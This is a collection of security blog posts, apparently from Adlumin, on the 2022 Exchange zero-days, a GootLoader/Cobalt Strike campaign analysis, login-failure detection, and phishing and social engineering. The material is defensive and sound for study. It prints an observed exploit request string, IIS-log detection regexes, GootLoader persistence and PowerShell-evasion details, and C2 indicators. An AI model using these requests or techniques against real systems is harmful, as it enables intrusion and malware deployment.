New Unpatched Microsoft Exchange Vulnerabilities - Remote Code Execution Vulnerabilities Allowing Potential Attacker Access

By: Director of Threat Research, Kevin O’Connor

Microsoft has confirmed a new pair of unpatched vulnerabilities affecting its Exchange mail server platform, tracked as CVE-2022-41040 and CVE-2022-41082. Microsoft validated the exploits’ existence and confirmed they are actively being used in the wild by malicious actors to compromise systems. The vulnerabilities are believed to affect only on-premises instances of Microsoft Exchange contained in Microsoft Windows Server 2013, 2016, and 2019, and not cloud-based Microsoft O365 mail applications and services such as Exchange Online, for which Microsoft states that detections and mitigations are already in place. Microsoft Exchange Online customers do not need to take any action.

What you Need to Know

Microsoft does not currently have a patch available for the vulnerabilities, but recommends that on-premises Microsoft Exchange customers review and apply the URL Rewrite instructions and block exposed Remote PowerShell ports. Microsoft’s guide for adding the blocking rule can be found here.

Add A Blocking Rule

  • Open the IIS Manager.
  • Expand the Default Web Site.
  • Select Autodiscover.
  • In the Feature View, click URL Rewrite.
  • In the Actions pane on the right-hand side, click Add Rules.
  • Select Request Blocking and click OK.
  • Add the following string and click OK:
    • .*autodiscover\.json.*\@.*Powershell.*
  • Expand the rule, select it, and click Edit under Conditions.
  • Change the condition input from {URL} to {REQUEST_URI}.

Blocking PowerShell Ports

Block the following ports used for Remote PowerShell:

HTTP: 5985

HTTPS: 5986

The pair of CVEs are a Server-Side Request Forgery (SSRF) vulnerability (CVE-2022-41040) and a Remote Code Execution (RCE) vulnerability (CVE-2022-41082). The SSRF vulnerability can only be used by authenticated attackers, suggesting that credentialed or other authorized access is needed to exploit the system. The SSRF vulnerability can then be used to reach and trigger the RCE vulnerability.

The vulnerabilities were uncovered by GTSC, a Vietnamese security company, during monitoring and incident response services in live networks. GTSC detected exploit requests in IIS logs with the same format as the previous 2021 ProxyShell RCE vulnerability:

autodiscover/autodiscover.json?@/&Email=autodiscover/autodiscover.json%3f@

It has been observed in the wild that the CVEs have been used to drop webshells on exploited Exchange servers, including AntSword, a Chinese open-source cross-platform website administration tool that supports webshell management. The webshell’s codepage is also set to a Microsoft character encoding for simplified Chinese, again suggesting China-based actor involvement. During these exploitation campaigns, attackers leveraging the vulnerabilities also modified the file RedirSuiteServiceProxy.aspx to contain a webshell. GTSC also reported the use of SharPyShell, a small and obfuscated ASP.NET webshell for C# web applications.

As part of their Tactics, Techniques, and Procedures (TTPs), attackers exploiting the vulnerabilities have also been observed leveraging the native Windows binary certutil.exe to connect to command-and-control infrastructure and retrieve malicious payloads. Some of the commands share similarities with those used by the China Chopper web shell malware. The attackers also leverage in-memory DLL injection and the native Windows WMIC utility to execute files.

To identify potential exploitation of these vulnerabilities, administrators can search Microsoft IIS logs for the following pattern, which indicates potential compromise:

    powershell.*autodiscover\.json.*\@.*200

Microsoft is currently working to develop a patch for the vulnerabilities; however, Microsoft Exchange administrators should take immediate action to defend systems and search for prior signs of compromise.

Keeping a network secure from zero-day exploitation requires a layered defense-in-depth approach. Externally available services such as email servers continue to be a prime target for exploitation by threat actors. Systems such as Adlumin’s Perimeter Defense capabilities can monitor these external systems for the appearance of exploitation artifacts such as newly opened ports on internet-accessible servers used for remote exploitation interfaces such as PowerShell.

Continuous Monitoring

Adlumin recommends using a Continuous Vulnerability Management (CVM) product to collect the needed data from endpoints to determine if they are running vulnerable versions of Microsoft Windows and Office. CVM software can also be used to identify those assets which have or do not have the official Microsoft mitigation in place. Adlumin also recommends leveraging the business’s SIEM product to continually search and alert for suspicious executions which may be a result of the exploitation of the vulnerability.

Resources

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41040
  3. https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server (Deprecated)
  4. https://www.techtarget.com/whatis/feature/Everything-you-need-to-know-about-ProxyShell-vulnerabilities
  5. https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/
  6. https://github.com/antonioCoco/SharPyShell

Everything you Need to Know about Tracking GootLoader

By: Kyle Auer & Kevin O’Connor

Adlumin’s Threat Visibility Team has observed an increase in GootLoader-based malware and identified a possible unified campaign leveraging GootLoader with follow-on Cobalt Strike payloads in attempts to breach U.S. businesses including multiple Adlumin customers.

What is GootLoader?

GootLoader is a presumed access-as-a-service malware [1], with its developers also being responsible for the GootKit malware, as first reported by Dr. Web in 2014 [2]. GootKit, the actor’s namesake and original toolkit, is distinct from GootLoader in that GootLoader is closer to an initial access capability which leverages follow-on stages such as Cobalt Strike, various ransomware payloads, and potentially GootKit – the latter of which has fallen out of favor since gaining notoriety in 2019 due to infrastructure compromise [3].

As an access-as-a-service malware, the GootLoader operators would be expected to sell direct access to compromised hosts and systems or provide buyers with harvested credentials and access points into a targeted network. A less frequent operation under this model might involve the GootLoader actors loading second-stage payloads as access brokers.

Tracking the Campaign

Adlumin is observing and tracking an active exploitation campaign utilizing GootLoader against U.S. businesses in multiple industries and verticals. What we’ve observed in this campaign is uniform deployment of Cobalt Strike payloads following exploitation and initial access provided by GootLoader. It’s unknown if these Cobalt Strike payloads are used by GootLoader developers to provide direct access to an infected target or used to harvest credentials and other data which is brokered to a buyer for access or exploited in some other way.

Our investigation is tracking an exploitation campaign, which we defined based on:

  1. Like-to-identical initial access and exploit methodologies
  2. Like-to-identical command and control infrastructure and methodology
  3. Like-to-identical operations time-frame
  4. Like-to-identical first-stage “loader” malware, GootLoader
  5. Like-to-identical second-stage follow-on malware, Cobalt Strike

Campaign Tactics, Techniques, and Procedures (TTPs)

This GootLoader campaign begins its attack by phishing potential victims’ business emails. Unlike other campaigns reported earlier in 2021 and 2022 [4], this campaign has not yet been observed relying on SEO poisoning attacks to deliver its payload. We believe the payloads are also not being disguised as legitimate jQuery libraries, as previously seen.

It starts with an email…

Figure 1: The Attack Begins with a Malicious JavaScript file contained in a Zip Archive

The first stage in the campaign against a target is a simple phishing email. These emails have an attached Zip archive, which contains a JavaScript payload the victim is tricked into running after opening. This JavaScript payload is executed by Windows Script Host (wscript.exe), a native Windows binary and legitimate application typically used for logon scripts, administration, and automation, which provides the execution environment in which the script runs. Our team believes that the JavaScript payload is delivered via a compressed archive to help mitigate detection by email and malware scanners.


Figure 2: JavaScript is executed by wscript.exe

GootLoader then uses this wscript.exe-hosted JavaScript to download an additional JavaScript resource, which is loaded by the original calling wscript.exe process. This secondary payload is responsible for persisting two separate payloads.


Figure 3: wscript.exe retrieves payloads from Command and Control Server

Persistence

GootLoader uses its secondary JavaScript payload to write two registry keys to the Windows Current User registry hive (HKCU). In this tracked campaign the two registry keys were stored in:

  • HKCU:\\Software\Microsoft\Phone\user0
  • HKCU:\\Software\Microsoft\Phone\user


Figure 4: wscript.exe runs PowerShell to persist malware as a task, and writes encoded payloads to registry

Kick-Off

After saving the next two stages to the registry, the wscript.exe process launches PowerShell with commands that kick off the first-stage malware implant. To help evade detection by security software, the executed PowerShell commands make use of multiple evasion techniques, including:

  • Base64-encoding the command
  • Command abbreviation
  • Variable substitution
  • String concatenation

Decoding the Base64 and interpreting the resulting bytes as UTF-16LE, we can see the command’s contents:


Figure 5: Decoded PowerShell Command Loading Stage 1 Implant

This command grabs the contents of the first registry key, HKCU:/SOFTWARE/Microsoft/phone/$USERNAME0, decodes the encoded .NET DLL it contains, and then runs the Test() function contained in the DLL as the execution entry point.

Obtaining Decoded Stage-1

To get the malware to drop the DLL unencoded for further analysis, rather than directly loading and calling it via PowerShell, we modified the executed PowerShell command to write the contents to a file by appending the following before the last Sleep function:

    +> Set-Content $PATH -Value $ejv -Encoding Byte

This allowed us to analyze this first-stage implant to identify that the Test() function was being used to load the second-stage implant.


Figure 6: PowerShell.exe decodes the GootLoader implant which decodes and runs the secondary payload, Cobalt Strike

Second Stage Payload

The second payload and malware implant used by GootLoader in this campaign is Cobalt Strike. The second registry key written in the earlier stage to HKCU:\..Phone\$USERNAME contains an encoded Cobalt Strike beacon. When the first-stage’s Test() function is executed, it decodes, loads, and executes the Cobalt Strike beacon into memory.

To analyze the Cobalt Strike beacon, we modified the retrieved first payload, which loads the beacon, to instead write the beacon unencoded to disk for retrieval and analysis. We did this by adding the library imports needed for writing a file and adding a main function which calls the Test() loader.


Figure 7: Adding additional imports to 1st Stage Malware Implant


Figure 8: Adding function to call the 2nd Stage DLL’s Test() function

We then created a BinaryWriter object and commented out the lines which would execute the Cobalt Strike beacon.

Figure 9: Modifying 1st stage to prevent 2nd stage execution and retrieve decoded 2nd stage

After building and running the code, we obtained the decoded second-stage Cobalt Strike payload.

Extracting Campaign IOCs from Cobalt Strike

Cobalt Strike is a paid penetration testing software which includes configurable malware implants that are often repurposed for use in real malware operations and infections. The Cobalt Strike beacon provides functionality for the attacker including command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained [5]. Cobalt Strike has exploded in popularity among cyber-criminals [6], and is a perfect launching platform for continued attacks or access transfer.

Once we had the decoded Cobalt Strike beacon written to disk, we were able to use public decoders to extract Cobalt Strike configuration information such as command and control addresses. We used the Python-based Cobalt Strike Configuration Extractor and Parser which can be found on GitHub, here.

Figure 10: Decoded Cobalt Strike Beacon Payload

This allowed us to obtain the malware command and control infrastructure used by the attackers to control the Cobalt Strike implant.

Figure 11: Cobalt Strike is run and beacons to Cobalt Strike command and control server

Summary & Future Reads

Once Adlumin’s Threat Visibility Team had the initial payload, follow-on implant stages, and leads on command-and-control infrastructure, we quickly created detections for our MDR platform, which merges data from multiple security relevant data sources including the endpoint and installed security software. These detections caught subsequent attacks from the same campaign and identified some historical retroactive activity. Some key defenses and mitigations for the campaign include:

  • Adequate phishing mitigation and attachment scanning solutions
  • Monitoring of wscript.exe executions of JavaScript files from compressed archives
  • Monitoring of PowerShell executions, especially of encoded commands, which have a parent process of wscript.exe
  • Implementing a Proactive Defense program that is equipped with fully managed security awareness testing and training, designed to empower employees to recognize and reduce the risk posed by cybercriminals.

Additionally, Adlumin is sharing the following indicators used in this campaign with the community:

  • 93[.]115[.]29[.]50
  • hxxps://streamlock[.]net

We’d also like to share the below Sigma rule to help identify possible exploitation activity:

title: GootLoader Zipped JS WScript
id: 37d82863-216a-41a3-a4de-b09cea08eb92
action: global
status: experimental
references:
  - https://adlumin.com
date: 2022/09/26
tags:
  - attack.execution
  - attack.t1059
author: Adlumin, Kyle Auer, Kevin O'Connor
detection:
  condition: selection
level: medium
---
logsource:
  category: process_execution
  product: windows
detection:
  selection_1:
    Image|endswith:
      - '\powershell.exe'
    ParentImage|endswith:
      - '\wscript.exe'
  selection_2:
    Image|endswith:
      - '\wscript.exe'
  selection_3:
    CommandLine|all:
      - '*AppData*'
      - '*zip*'
      - '*.js*'
  condition: (selection_1 or selection_2) and selection_3
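The rule’s logic reproduced in Python over constructed process-creation events, together with the Base64-then-UTF-16LE decoding step described in the Kick-Off section above. This is an added example, not Adlumin’s detection code; the paths, user name and encoded command in the sample events are invented.

```python
import base64
from typing import Dict, List, Optional


def encode_command(command: str) -> str:
    """Build what PowerShell expects after -EncodedCommand: UTF-16LE text, then Base64.
    Used here only to construct a realistic sample event."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed process-creation events (not real telemetry); field names follow
# the Sigma rule above. Paths, user name and the encoded command are invented.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # wscript.exe running a .js extracted from a zip under AppData (selection_2 + selection_3)
        "Image": r"C:\Windows\System32\wscript.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\jdoe\AppData\Local\Temp\invoice.zip\invoice_form.js"',
    },
    {   # PowerShell spawned by wscript.exe with an encoded command (selection_1)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": "powershell.exe -w hidden -NoP -enc "
                       + encode_command(r"Get-ItemProperty HKCU:\Software\Microsoft\Phone"),
    },
    {   # benign: an administrator's script launched from Explorer
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\Backup.ps1 -Path C:\Users\jdoe\AppData\Local\app.zip",
    },
]


def _endswith_any(value: str, suffixes: List[str]) -> bool:
    v = value.lower()                   # Sigma string matching is case-insensitive
    return any(v.endswith(s.lower()) for s in suffixes)


def _contains_all(value: str, needles: List[str]) -> bool:
    v = value.lower()                   # '*zip*' in Sigma is a contains-match
    return all(n.lower() in v for n in needles)


def matches_rule(event: Dict[str, str]) -> bool:
    """(selection_1 or selection_2) and selection_3, exactly as the rule states."""
    image = event.get("Image", "")
    parent = event.get("ParentImage", "")
    cmd = event.get("CommandLine", "")
    selection_1 = _endswith_any(image, ["\\powershell.exe"]) and _endswith_any(parent, ["\\wscript.exe"])
    selection_2 = _endswith_any(image, ["\\wscript.exe"])
    selection_3 = _contains_all(cmd, ["AppData", "zip", ".js"])
    return (selection_1 or selection_2) and selection_3


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand (or any unambiguous prefix such
    as -enc / -e), or None if the command line carries none or the value is not
    valid Base64 / UTF-16LE."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower().replace("/", "-", 1)
        if flag.startswith("-e") and "-encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage(events: List[Dict[str, str]]) -> List[dict]:
    """Apply the rule to each event and decode any encoded PowerShell payload."""
    findings: List[dict] = []
    for ev in events:
        hit = matches_rule(ev)
        decoded = decode_encoded_command(ev.get("CommandLine", ""))
        if hit or decoded is not None:
            findings.append({"image": ev["Image"].rsplit("\\", 1)[-1],
                             "rule_match": hit, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

In the sample, the PowerShell child carries none of the selection_3 strings on its own command line, so it surfaces through the decoder rather than the rule; the wscript.exe launch is what the rule catches.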

Make sure to follow Adlumin for follow-up posts where we’ll dive deeper into the actor’s infrastructure and operations!

Resources:

  1. https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html
  2. https://securelist.com/gootkit-the-cautious-trojan/102731/
  3. https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/
  4. https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader
  5. https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
  6. https://threatpost.com/cobalt-strike-cybercrooks/167368/

Your Guide to Detecting Access Failure Incidents

By: Data Scientists Bronwen Cohn-Cort and Shaul Saitowitz

Usernames and passwords are keys to computer systems and networks, but they are often inadequate for keeping intruders out. Even additional layers of authentication can be compromised. Adlumin keeps its customers safe by monitoring networks for suspicious break-in attempts and authentication malfunctions.

Brute Force, but Not with a Crowbar

Hackers use scripts or applications such as THC Hydra to submit many guesses for user credentials – a brute force attack. Guessing tactics range from a simple systematic approach to using external logic to prioritize the most likely combinations.

Any asset that uses credentials is vulnerable to brute force attacks, from user accounts to VPNs or network switches. Each of these represents different risks. Cracking a network switch could allow the attacker to access any traffic flowing through that switch and even make changes to the switch itself. Breaking into a VPN would give access to the network and anything else authorized for the connection.


Figure 1: Counts of Failed Office365 Logins

Adlumin monitors all incoming logs for our tenants, looking for evidence of brute force attacks at all possible entry points. A suspicious number of failed logins over a short interval indicates that an attacker is attempting to break in by trying many password permutations. This triggers an alert, notifying the customer of the break-in attempt so that protective action can be taken.

The Deadbolt

Often used in conjunction with password logins, Multi-factor Authentication (MFA) service providers allow users of a subscribing client to authenticate via other methods, thereby adding another layer of security. One standard additional layer is a Possession Factor, where a user enters a 6-digit code sent as a text message, email, or given by an authenticator app to an account or device to which only the user has access. In the MFA context, a password can be classified as a Knowledge Factor; thus, these two factors (Knowledge and Possession) authenticate the user. This is also called 2-Factor Authentication (2FA). Enabling MFA or 2FA across all users is a simple step to improving security and delaying attackers or keeping them out of a system.


Figure 2: Disruptive situations around MFA credentials

Adlumin Data Science is developing a detection for disruptions in a client’s MFA service – incidents that can challenge business continuity or represent even more insidious threats. The approach involves reviewing the number of users unable to access their account via MFA within a specific period. As described earlier in this article, this activity could be an attacker attempting brute force methods to access the system by logging in to multiple user accounts and looking to gain access via a user that hasn’t enabled MFA. This activity could also be that the MFA service provider is compromised or has otherwise experienced an incident that impacts credential authentication, leading to many users being locked out of their accounts. In both instances of MFA credentials being denied or resulting in the locking-out of users, the client’s business is disrupted.

This detection, based on identifying an unusual number of users experiencing lockouts or having credentials denied over a specific period, would warn clients that use MFA service providers of a possible impending disruption or attack.
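An added example (not Adlumin’s detection logic) of the two checks described in this article: a sliding window over authentication events that flags a burst of failed logins from one source, and one that flags an unusual number of distinct users denied by MFA or locked out within a short period. The events, thresholds and window lengths are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Optional, Tuple

# Constructed authentication events (not customer data):
# (ISO timestamp, user, source IP, outcome)
SAMPLE_EVENTS: List[Tuple[str, str, str, str]] = [
    ("2022-10-03T09:00:05", "alice", "198.51.100.4", "success"),
    ("2022-10-03T09:02:00", "alice", "198.51.100.4", "bad_password"),   # one typo, then success
    ("2022-10-03T09:02:20", "alice", "198.51.100.4", "success"),
    ("2022-10-03T09:10:00", "bob",   "203.0.113.9", "bad_password"),    # one source, many accounts
    ("2022-10-03T09:10:03", "carol", "203.0.113.9", "bad_password"),
    ("2022-10-03T09:10:07", "dave",  "203.0.113.9", "bad_password"),
    ("2022-10-03T09:10:11", "erin",  "203.0.113.9", "bad_password"),
    ("2022-10-03T09:10:15", "frank", "203.0.113.9", "bad_password"),    # 5th failure in window
    ("2022-10-03T09:10:19", "grace", "203.0.113.9", "bad_password"),
    ("2022-10-03T09:30:00", "alice", "198.51.100.4", "mfa_denied"),     # unrelated users, same window
    ("2022-10-03T09:31:30", "bob",   "198.51.100.22", "mfa_denied"),
    ("2022-10-03T09:33:10", "carol", "198.51.100.31", "locked_out"),    # 3rd distinct user
    ("2022-10-03T09:34:00", "dave",  "198.51.100.8", "mfa_denied"),
]

Event = Tuple[datetime, str, str, str]


def parse(events: List[Tuple[str, str, str, str]]) -> List[Event]:
    """Convert timestamps and sort, so the sliding windows below see events in order."""
    rows = [(datetime.fromisoformat(ts), user, ip, outcome) for ts, user, ip, outcome in events]
    return sorted(rows)


def failed_login_bursts(events, window=timedelta(minutes=5), threshold=5) -> Dict[str, Tuple[datetime, int]]:
    """Per source IP, alert the first time `threshold` failed logins fall inside `window`.
    Returns {ip: (time of alert, number of distinct accounts tried in that window)}."""
    recent: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    alerts: Dict[str, Tuple[datetime, int]] = {}
    for ts, user, ip, outcome in parse(events):
        if outcome != "bad_password":
            continue
        q = recent[ip]
        q.append((ts, user))
        while q and ts - q[0][0] > window:     # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = (ts, len({u for _, u in q}))
    return alerts


def mfa_disruption(events, window=timedelta(minutes=10), threshold=3) -> Optional[Tuple[datetime, List[str]]]:
    """Alert when at least `threshold` distinct users are denied by MFA or locked out
    inside `window`, regardless of source: a signal for a provider-side incident as
    well as for an attacker working through many accounts."""
    q: Deque[Tuple[datetime, str]] = deque()
    for ts, user, _ip, outcome in parse(events):
        if outcome not in ("mfa_denied", "locked_out"):
            continue
        q.append((ts, user))
        while q and ts - q[0][0] > window:
            q.popleft()
        users = {u for _, u in q}
        if len(users) >= threshold:
            return ts, sorted(users)
    return None


if __name__ == "__main__":
    print("failed-login bursts:", failed_login_bursts(SAMPLE_EVENTS))
    print("MFA disruption:", mfa_disruption(SAMPLE_EVENTS))
```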

Warning of Possible Disruptions

Whether caused by a brute force attack or a compromised MFA service provider, Adlumin Data Science monitors for a suspicious or unusual amount of credential activity for network switches, user accounts, or other credentialed locations. Adlumin’s identification of such a disruption or break-in attempt warns customers to take protective action.

Could you be the Next Bait for a Phishing Attack?

By:
Krystal Rennie, Director of Corporate Communications,
and Brittany Demendi, Corporate Communications Manager

Have you ever received an email informing you that you’ve won an all-expense paid trip to the Bahamas in a raffle you never entered? Or received an email from a streaming service notifying you that your credit card was rejected and to click on the link to update your payment method? You’ve been exposed to a form of phishing. These are examples of email phishing, which use tactics that are untargeted but appear everywhere. By comparison, more targeted versions of phishing are more dangerous and can lead to identity theft, unauthorized access to sensitive data, or the defrauding of funds.

To an organization, phishing is always a severe risk. Phishing is an early-stage and reliable tactic used by hackers to gain access to networks as part of a larger attack. For example, if you’ve been mentoring a graduate student for weeks and they send you an academic survey, would you open it? If your CFO receives formal notification of a lawsuit from a competitor, would you contact the law firm? If your IT department sends a message about service upgrades that require a new login, would you follow the instructions? These can all be examples of phishing.

Cybercriminals commonly use phishing to lure potential victims into performing harmful actions that could put your organization’s data at risk. This technique is the art of manipulating people to give up confidential information by either typing their login credentials to a fake company website or clicking a malicious attachment they thought was an invoice. Because phishing is effective and straightforward, cybercriminals launch thousands of attacks daily and can often be successful.

Five Most Common Types of Phishing Attacks

Regardless of the type of organization, large or small, it will be targeted by cybercriminals attempting a phishing attack. Phishing attacks are getting more difficult to spot, as some will get past even the most observant employees. Education on these different types of phishing attacks is essential. Below are five common types of phishing attacks:

  1. Spear-Phishing is a targeted attack that aims to steal sensitive data from a specific organization or individual. Cybercriminals lure in the victims with personal information specific to the organization or the employee to seem more legitimate.
  2. Vishing is a phishing attack that occurs over the phone. Calls are usually made using a spoofed ID to make it seem safe to answer. As an example, a hacker could pose as a representative at your bank or credit union and call to alert you that there has been questionable activity on your account. Once they’ve gained your trust, the hacker will ask for your personal account information and can use that information to commit identity fraud.
  3. Whaling is a cyberattack that includes a high-level choice of target in an attempt to steal and misuse private, personal information of senior management at a company/organization. Whaling occurs in the form of emails that are more sophisticated than phishing and are often harder to recognize due to their use of elite corporate language. The email will include personalized information about the target or organization.
  4. Smishing uses SMS to text personal information like credit card information, passwords, and more to appear legitimate and acquire additional information. The text message usually includes a call to action to demand an immediate response or reaction.
  5. Clone Phishing involves receiving a spoofed email that looks identical to one sent by someone you have already received emails from. The spoofed email, however, is malicious and contains new information along with malicious links or attachments.

Consequences of a Successful Attack

Although the types of phishing attacks vary regarding risk levels, one thing they all have in common is the power to damage a business. Below are a few possible results of a successful phishing attack:

  • Unauthorized transactions
  • Password and username manipulation
  • Account takeovers
  • Identity theft
  • Credit card theft
  • Stolen data
  • Stolen funds
  • Sensitive data sold to third parties

These are just a few examples of what could become compromised when these attacks occur. Companies must invest in the proper Managed Detection and Response platform and Proactive Defense Program to help protect sensitive information and train employees on security awareness.

Be Proactive Against Phishing Attacks, Not Reactive

Equipping employees with the proper knowledge is the best defense when protecting an organization’s data and assets from phishing attacks. In 2019, a major healthcare company reported that one of its employees stopped a phishing attack within 19 minutes, according to Comparitech. Their employee said that they received suspicious emails, and their Security Operations Center was able to take care of it immediately. Creating a security culture within every department, not just IT, is vital.

As phishing emails become harder to detect, investing in security awareness training like a Proactive Defense Program will be the main differentiator between robust risk management plans and weak ones. The truth is that the future of phishing attacks depends on many factors. Cybercriminals are discovering new ways to step their game up daily and have become more sophisticated with their attacks. That said, it is up to the rest of us to find new ways to combat their tactics. At the end of the day, there is too much at stake if we do not think multiple steps ahead of cybercriminals.

Five Unique Tactics of Social Engineering Attacks

By: Krystal Rennie, Director of Corporate Communications, and Brittany Demendi, Corporate Communications Manager

Five Unique Tactics of Social Engineering Attacks is a part of Adlumin’s Cyber Blog content series. For more information about how your organization can protect itself from cybercriminals, browse more from our knowledge-rich series here.


As cybercriminal organizations and state-sponsored actors grow in sophistication and capability, they remain loyal to the simple tactics and techniques that deliver results. “Social Engineering” might not carry the glamor of a technical zero-day malware attack, but it works. Social engineering works so well that 90% of cyberattacks on organizations involve some form of the tactic, according to KnowBe4. Employees are then vulnerable to influence and often become unwitting accomplices in a cybercrime.

Social Engineering is when “an attacker uses human interaction (social skills) to obtain or compromise information about an organization or its computer systems. An attacker may seem unassuming and respectable, possibly claiming to be a new employee, repair person, or researcher and even offering credentials to support that identity.”

Cybersecurity & Infrastructure Security Agency (CISA).

Social engineering tactics can take multiple forms, from collecting publicly available information on social media to conducting search engine analysis. Fundamentally, these tactics identify valuable tools and information that potential victims might seek and be more likely to interact with. Social Engineering is about gaining a user’s trust.

Social engineering strategies can involve fake emails and websites that look authentic and can fool the entire spectrum of employees. Everyone can be a target, from engineers to sales and marketers, finance admins, and senior executives. Social engineering aims to manipulate a target user into revealing sensitive data about their business or personal information. This stolen information can create a phishing campaign that looks authentic. These attacks seek to gain information and can take many different forms, making it harder to pinpoint the cybercriminal’s entry point.

Five Common Tactics of Social Engineering

  1. Scareware: An attack that bombards victims with false alarms and fictitious threats about their devices. Victims are misled to think that their systems are infected with malware, prompting them to install malicious software or malware itself. In one of the most extreme cases, following a massive credit theft from a major retailer, cardholders were contacted through phone calls and asked to update their security measures. Of course, the calls came from cybercriminals collecting victims’ PINs and passwords.
  2. Baiting: A form of social engineering that incentivizes users to take the action the attacker wants. These attacks often include offers of gifts, exclusive offers, courier packages, and other well-known “lures.” Engaged users give up their personal information or sign up for fictitious accounts, exposing their passwords. Since passwords are often recycled across multiple accounts, this can create a severe breach and risk to the organization. More rarely, baiting can even use physical media like flash drives: dropped in the employee parking lot, one may be picked up by an unsuspecting individual and release malware once plugged into a company computer.
  3. Pretexting: In this form of social engineering, attackers approach victims requesting sensitive information necessary to complete a critical task or service. Appearing as friendly actors, these criminals solicit data about the victim using various motivators like tax refunds, payments, deliveries, or business-related projects.
  4. Spear Phishing: These attacks target individuals with roles within the company, seniority, rank, authority, and access to critical systems. They often target professionals such as lawyers, doctors, or engineers, who are presented with fake license complaints and lawsuits. In other cases, executives were targeted with emails and branded file shares containing lawsuit filings, the basis of which was stolen from publicly available court filings and stolen litigation material. Spear Phishing is perhaps one of the most challenging forms of social engineering because it is extremely difficult to distinguish from legitimate traffic and communications.
  5. Quid Pro Quo: This type of attack centers around an exchange of service or information convincing the victim to act. Typically, the cybercriminal will promise rewards or leverage implicit work motivations to the victim for information that can be used to steal money or take control of a company account or data. One of the most common examples is when the cybercriminal poses as an IT employee asking for or offering technical support.

Many social engineering schemes happen daily. Like all strategies, some techniques are more well-known than others. However, unlike other cyberattacks, human interaction is a critical component of social engineering, which should make you think more carefully about your daily interactions on the internet. These attacks underline the importance of understanding that attacks are much harder to identify and often dupe employees in the early stages of a much larger cyber campaign.

Training is Key to Proactive Defense Against Social Engineering

Employees are your organization’s first line of defense regarding protection from social engineering methods. If employees are not appropriately trained against these tactics, your security software can only defend you until someone clicks on a malicious link.

Yes, there are ways to hunt these threats before they take over your IT network, but it’s best to think proactively and put the fire out at the source. Finding and implementing the right Proactive Defense Program will empower employees with the skills to find and report suspicious activity. These are not just one-off sessions that overwhelm employees with information they will soon forget. It’s consistent training that creates a positive cybersecurity culture within the organization.

Training needs to be persistent and delivered in small doses throughout the year for information retention. Proactive Defense Programs use real-life de-weaponized attack campaigns to test employees. In addition, implementing training ensures your organization complies with set industry regulations and set policies and tracks and trains high-risk users.

What’s Next?

Now that you have this new information, you might wonder, what’s next? The best advice when attempting to combat social engineering threats is to know the signs and prioritize implementing a Proactive Defense Program throughout your company. Social engineers manipulate feelings and human logic to lure victims into their traps. As a result, we must be wary of what we open, click, and interact with while navigating our online experiences. Always remain alert and trust your gut instinct; if something doesn’t feel right, nine times out of ten, it isn’t right.